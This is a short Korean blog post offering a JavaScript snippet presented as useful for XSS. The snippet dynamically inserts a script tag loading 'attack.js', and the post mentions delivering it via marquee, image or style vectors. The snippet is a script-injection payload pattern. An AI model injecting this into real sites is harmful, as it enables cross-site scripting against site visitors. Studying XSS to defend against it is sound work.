XSS에 유용한 자바스크립트
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'attack.js';
document.body.appendChild(script);
ㅡ_ㅡ;;;;
그래도 브라우저 측에서 차단하지 않을까 반신반의하며 실행했는데.. 잘된다.
대..대단하군!
로드방법은 마퀴, 이미지, 스타일등으로.. ㅋ
덧: XSS 연구하다가 발견한 것이 아니라 전혀 관련없는 삽질을 하던 중에 알게된 것임!
- xss , javascript , 해킹 , 보안
